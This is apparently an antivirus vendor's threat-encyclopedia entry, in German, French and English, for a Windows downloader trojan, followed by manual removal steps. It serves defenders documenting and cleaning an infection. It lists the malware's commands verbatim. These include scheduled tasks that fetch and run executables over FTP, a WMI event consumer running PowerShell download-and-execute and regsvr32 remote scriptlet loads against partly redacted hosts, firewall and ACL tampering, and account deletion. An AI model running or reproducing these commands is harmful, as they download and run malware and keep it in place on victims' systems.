Trojan.Win32.DLOADR.AUSUSN
Trojan.VBS.Starter.lr (KASPERSKY); Gen:Variant.Strictor.230978 (BITDEFENDER)
Windows
Type de grayware:
Trojan
Destructif:
Non
Chiffrement:
In the wild::
Oui
Overview
Détails techniques
Installation
Fügt die folgenden Prozesse hinzu:
- "%System%\WScript.exe" "%Windows%\inf\n.vbs"
- %Windows%\inf\n.vbs
- "%Windows%\inf\c3.bat"
- %Windows%\inf\c3.bat
- net1 user mm123$ /del
- net1 user admin$ /del
- net1 user sysadm05 /del
- net stop AnyDesk
- sc config AnyDesk start= disabled
- attrib -s -h -r %System Root%\Users\Default\AppData\Local\Temp\*.exe
- attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe
- attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\*.exe
- attrib -s -h -r %System Root%\Users\{username}\AppData\Local\Temp\*.exe
- attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe
- attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\*.exe
- attrib -s -h -r %User Temp%\*.exe
- attrib -s -h -r %Application Data%\Tempo\*.exe
- attrib -s -h -r %Application Data%\*.exe
- taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
- cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d everyone
- cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d system
- cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
- cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system
- cacls "%System Root%\Program Files\autodesk\*.exe" /e /d everyone
- cacls "%System Root%\Program Files\autodesk\*.exe" /e /d system
- cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d everyone
- cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d system
- cacls "%Program Files%\RemoteDesk\*.exe" /e /d everyone
- cacls "%Program Files%\RemoteDesk\*.exe" /e /d system
- cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
- cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
- cacls "%Program Files%\autodesk\*.exe" /e /d everyone
- cacls "%Program Files%\autodesk\*.exe" /e /d system
- cacls "%Program Files%\anydesk\*.exe" /e /d system
- cacls "%Program Files%\anydesk\*.exe" /e /d everyone
- cacls %Windows%\debug\WIA\*.exe /e /d everyone
- cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d everyone
- cacls %Application Data%\Tempo /e /d everyone
- cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d system
- cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
- cacls %Application Data%\Tempo /e /d system
- cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d system
- cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d everyone
- cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
- cacls %System Root%\Users\{username}\AppData\Roaming\*.exe /e /g everyone:f
- cacls %Application Data% /e /g everyone:f
- cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g system:f
- cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g everyone:f
- cacls %User Temp% /e /g system:f
- cacls %User Temp% /e /g everyone:f
- cacls %System Root%\Users\Default\AppData\Local\Temp /e /g everyone:f
- cacls %System Root%\Users\Default\AppData\Roaming /e /g everyone:f
- cacls %System Root%\Users\Default\AppData\Roaming /e /g system:f
- cacls %System Root%\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
- cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
- cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g system:f
- cacls %System Root%\SysData\*.exe /e /d system
- cacls %System Root%\Msupdate /e /d system
- cacls %Windows%\xcecg /e /d system
- cacls %Windows%\ccm /e /d system
- cacls %Windows%\smss.exe /e /d system
- cacls "%System Root%\Program Files\Common Files\Services\*.exe" /e /d system
- cacls %System%\a.exe /e /d system
- cacls %Windows%\security\*.exe /e /d system
- cacls %Windows%\security\*.exe /e /d everyone
- cacls %Windows%\Resources\*.exe /e /d system
- cacls %Windows%\Resources\*.exe /e /d everyone
- cacls %Windows%\Resources\Themes\*.exe /e /d system
- cacls %Windows%\Resources\Themes\*.exe /e /d everyone
- %System%\net1 stop AnyDesk
- cacls %Windows%\system\lsmsm.exe /e /d system
- cacls %All Users Profile%\homegroup\*.exe /e /d system
- cacls %All Users Profile%\diskdata\*.exe /e /d system
- cacls "%Program Files%\Microsoft Updates" /e /d system
- cacls %System%\servwdrv.dll /e /d system
- cacls %System%\servwdrv.dll /e /d everyone
- cacls %System%\servwdrvx.dll /e /d system
- cacls %System%\servwdrvx.dll /e /d everyone
- cacls %System%\serwwdrv.dll /e /d system
- cacls %System%\serwwdrv.dll /e /d everyone
- cacls %Windows%\svchost.exe /e /d system
- cacls %All Users Profile%\WmiAppSrv\svchost.exe /e /d system
- cacls %Windows%\Help\taskhost.exe /e /d system
- cacls %Windows%\Web\wininit.exe /e /d system
- cacls %All Users Profile%\Microsoft\WmiAppSvr\csrss.exe /e /d system
- cacls %Program Files%\Common Files\svshpst.exe /e /d system
- cacls %Windows%\fonts\system32\svchost.exe /e /d system
- cacls %Windows%\fonts\*.exe /e /d system
- cacls %Windows%\Fonts\Microsoft /e /d system
- cacls "%Windows%\Temp\32p.zip ª¦?¿ó¿¦¿¦í+???? 1\*.*" /e /d system
- cacls "%Windows%\fonts\*.exe" /e /d system
- cacls %Windows%\taskmgrs.exe /e /d system
- cacls %Windows%\security\IIS\*.exe /e /d system
- cacls %Program Files%\Common Files\System\*.exe /e /d system
- cacls %Program Files%\dll\*.exe /e /d system
- cacls %Windows%\Fonts\*.exe /e /d system
- cacls %Program Files%\Common Files\Services\*.exe /e /d system
- cacls %Program Files%\Common Files\SpeechEngines\*.exe /e /d system
- cacls %Windows%\Fonts\system32\*.exe /e /d system
- cacls %Windows%\SpeechsTracing\*.exe /e /d system
- cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
- cacLS %Program Files%\Common Files\Micros~1\*.exe /e /d system
- cacls %System Root%\System\*.exe /e /d system
- cacls %Windows%\1\*.exe /e /d system
- cacls %Public%\*.exe /e /d system
- cacls "%Program Files%\Common Files\conime.exe" /e /d system
- cacls "%Program Files%\Common Files\conime.exe" /e /d system
- cacls %Program Files%\test\*.exe /e /d everyone
- cacls %Windows%\Fonts\help\*.exe /e /d system
- cacls %Windows%\web\*.exe /e /d system
- cacls %All Users Profile%\diskdata\*.exe /e /d system
- cacls "%Program Files%\SQLWriter$\*.exe" /e /d system
- cacls %Windows%\Prefetch\*.exe /e /d system
- cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
- cacls %Windows%\Fonts\Mysql\*.exe /e /d system
- cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
- cacls %Windows%\SysWOW64\drivers\taskmgr.exe /e /d system
- cacls %Windows%\SysWOW64\drivers\svchost.exe /e /d system
- cacls %Windows%\temp\svchost.exe /e /d system
- cacls %Windows%\Fonts\Windows\*.exe /e /d system
- cacls %System Root%\Msupdate /e /d system
- cacls %Windows%\Fonts\Windows\*.exe /e /d system
- cacls %All Users Profile%\Temp\*.exe /e /d system
- cacls %Public%\Music\*.exe /e /d everyone
- cacls %Public%\Music\*.vbs /e /d system
- cacls %Windows%\Help\lsass.exe /e /d system
- cacls %Windows%\temp\*.dll /e /d system
- cacls %Windows%\debug\Nat\*.exe /e /d system
- cacls %Windows%\Registration\*.exe /e /d system
- cacls %Application Data%\Tempo\*.exe /e /d everyone
- cacls "%Program Files%\Microsoft Blliasc\*.*" /e /d system
- cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
- cacls %Windows%\system\lsaus.exe /e /d system
- cacls "%All Users Profile%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
- cacls "%All Users Profile%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
- cacls "%All Users Profile%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
- cacls %All Users Profile%\Microsoft\HelpLibrary\*.dll /e /d system
- cacls %Windows%\WBEM\ccproxy\*.exe /e /d system
- cacls %All Users Profile%\Microsoft\Network\*.exe /e /d system
- cacls %Windows%\system\lsmsm.exe /e /d system
- cacls %Windows%\mysql.log /e /d system
- %System%\cmd.exe /S /D /c" echo y"
- %System%\cmd.exe /S /D /c" rd /s /q %Windows%\help\lsmosee.exe"
- %System%\cmd.exe /S /D /c" echo y"
- %System%\cmd.exe /S /D /c" rd /s /q %Windows%\debug\lsmosee.exe"
- net start MSSQLSERVER
- %System%\net1 start MSSQLSERVER
- schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe" /ru "system" /sc onstart /F
- schtasks /create /tn "Mysa1" /tr "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
- schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
- schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe" /ru "system" /sc onstart /F
- schtasks /create /tn "ok" /tr "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
- wmic process where "name='svchost.exe' and ExecutablePath<>'C:\WINDOWS\system32\svchost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\svchost.exe'" delete
- wmic process where "name='wininit.exe' and ExecutablePath<>'C:\WINDOWS\system32\wininit.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\wininit.exe'" delete
- wmic process where "name='csrss.exe' and ExecutablePath<>'C:\WINDOWS\system32\csrss.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\csrss.exe'" delete
- wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\system32\WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\WUDFHosts.exe'" delete
- wmic process where "name='services.exe' and ExecutablePath<>'C:\WINDOWS\system32\services.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\services.exe'" delete
- wmic process where "name='taskhost.exe' and ExecutablePath<>'C:\WINDOWS\system32\taskhost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\taskhost.exe'" delete
- wmic datafile where "Name='c:\windows\debug\lsmos.exe'" get Version /value
- findstr "=1\.0\.0\.1$"
- %System%\cmd.exe /c wmic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId|findstr "[0-9]"
- mic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId
- indstr "[0-9]"
- SCHTASKS /Delete /TN "WindowsUpdate1" /F
- SCHTASKS /Delete /TN "WindowsUpdate3" /F
- SCHTASKS /Delete /TN "Windows_Update" /F
- SCHTASKS /Delete /TN "Update" /F
- SCHTASKS /Delete /TN "Update2" /F
- SCHTASKS /Delete /TN "Update4" /F
- SCHTASKS /Delete /TN "Update3" /F
- SCHTASKS /Delete /TN "windowsinit" /F
- SCHTASKS /Delete /TN "System Security Check" /F
- SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
- SCHTASKS /Delete /TN "updat_windows" /F
- SCHTASKS /Delete /TN "at1" /F
- SCHTASKS /Delete /TN "at2" /F
- SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
- SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
- SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
- netsh ipsec static delete policy name=win
- netsh ipsec static delete filterlist name=Allowlist
- netsh ipsec static delete filterlist name=denylist
- netsh ipsec static delete filteraction name=allow
- netsh advfirewall firewall delete rule name="tcp all" dir=in
- netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
- netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
- netsh advfirewall firewall delete rule name="tcpall" dir=out
- sc config MpsSvc start= auto
- net start MpsSvc
- %System%\net1 start MpsSvc
- netsh advfirewall set allprofiles state on
- netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
- netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
- netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
- netsh ipsec static add policy name=win
- netsh ipsec static add filterlist name=Allowlist
- netsh ipsec static add filterlist name=denylist
- netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
- netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
- netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
- netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
- netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
- netsh ipsec static add filteraction name=Allow action=permit
- netsh ipsec static add filteraction name=deny action=block
- netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
- netsh ipsec static set policy name=win assign=y
- %System%\cmd.exe /S /D /c" ver "
- find "5.1."
- wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
- wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
- wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.{BLOCKED}e.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.162:8162/power.txt')||regsvr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.158.117:8117/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.{BLOCKED}e.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://{BLOCKED}.{BLOCKED}.155.170:8170/s.xsl\""
- cmd /c start wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
- wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
Autostart-Technik
Fügt folgende Registrierungseinträge hinzu, um bei jedem Systemstart automatisch ausgeführt zu werden.
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f
Andere Systemänderungen
Fügt die folgenden Registrierungsschlüssel hinzu:
HKEY_CURRENT_USER\Software\WinRAR SFX
Fügt die folgenden Registrierungseinträge hinzu:
HKEY_CURRENT_USER\Software\WinRAR SFX
C%%Windows%inf = "%Windows%\inf"
Einschleusungsroutine
Schleust die folgenden Dateien ein:
- %Windows%\inf\c3.bat
- %Windows%\inf\n.vbs
- %Windows%\inf\_tmp_rar_sfx_access_check_3196273
(Hinweis: %Windows% ist der Windows Ordner, normalerweise C:\Windows oder C:\WINNT.)
Solutions
Step 2
Für Windows ME und XP Benutzer: Stellen Sie vor einer Suche sicher, dass die Systemwiederherstellung deaktiviert ist, damit der gesamte Computer durchsucht werden kann.
Step 3
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 4
Im abgesicherten Modus neu starten
Step 5
Diesen Registrierungsschlüssel löschen
Wichtig: Eine nicht ordnungsgemäße Bearbeitung der Windows Registrierung kann zu einer dauerhaften Fehlfunktion des Systems führen. Führen Sie diesen Schritt nur durch, wenn Sie mit der Vorgehensweise vertraut sind oder wenn Sie Ihren Systemadministrator um Unterstützung bitten können. Lesen Sie ansonsten zuerst diesen Microsoft Artikel, bevor Sie die Registrierung Ihres Computers ändern.
- In HKEY_CURRENT_USER\Software
- WinRAR SFX
Step 6
Diesen Registrierungswert löschen
Wichtig: Eine nicht ordnungsgemäße Bearbeitung der Windows Registrierung kann zu einer dauerhaften Fehlfunktion des Systems führen. Führen Sie diesen Schritt nur durch, wenn Sie mit der Vorgehensweise vertraut sind oder wenn Sie Ihren Systemadministrator um Unterstützung bitten können. Lesen Sie ansonsten zuerst diesen Microsoft Artikel, bevor Sie die Registrierung Ihres Computers ändern.
- In HKEY_CURRENT_USER\Software\WinRAR SFX
- C%%Windows%inf = "%Windows%\inf"
- C%%Windows%inf = "%Windows%\inf"
- In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f
- start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f
Step 7
Diese Dateien suchen und löschen
- %Windows%\inf\c3.bat
- %Windows%\inf\n.vbs
- %Windows%\inf\_tmp_rar_sfx_access_check_3196273
Step 8
Deleting Scheduled Tasks
The following {Task Name} - {Task to be run} listed should be used in the steps identified below:
- Task Name: Mysa
- Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe"
- Task Name: Mysa1
- Task to be run: "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa"
- Task Name: Mysa2
- Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p"
- Task Name: Mysa3
- Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe"
- Task Name: ok
- Task to be run: "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa
For Windows 2000, Windows XP, and Windows Server 2003:
- Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks. - Locate each {Task Name} values listed above in the Name column.
- Right-click on the said file(s) with the aforementioned value.
- Click on Properties. In the Run field, check for the listed {Task to be run}.
- If the strings match the list above, delete the task.
For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:
- Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter. - In the left panel, click Task Scheduler Library.
- In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
- In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
- If the said string is found, delete the task.
Step 9
Führen Sie den Neustart im normalen Modus durch, und durchsuchen Sie Ihren Computer mit Ihrem Trend Micro Produkt nach Dateien, die als Trojan.Win32.DLOADR.AUSUSN entdeckt werden. Falls die entdeckten Dateien bereits von Ihrem Trend Micro Produkt gesäubert, gelöscht oder in Quarantäne verschoben wurden, sind keine weiteren Schritte erforderlich. Dateien in Quarantäne können einfach gelöscht werden. Auf dieser Knowledge-Base-Seite finden Sie weitere Informationen.
Participez à notre enquête!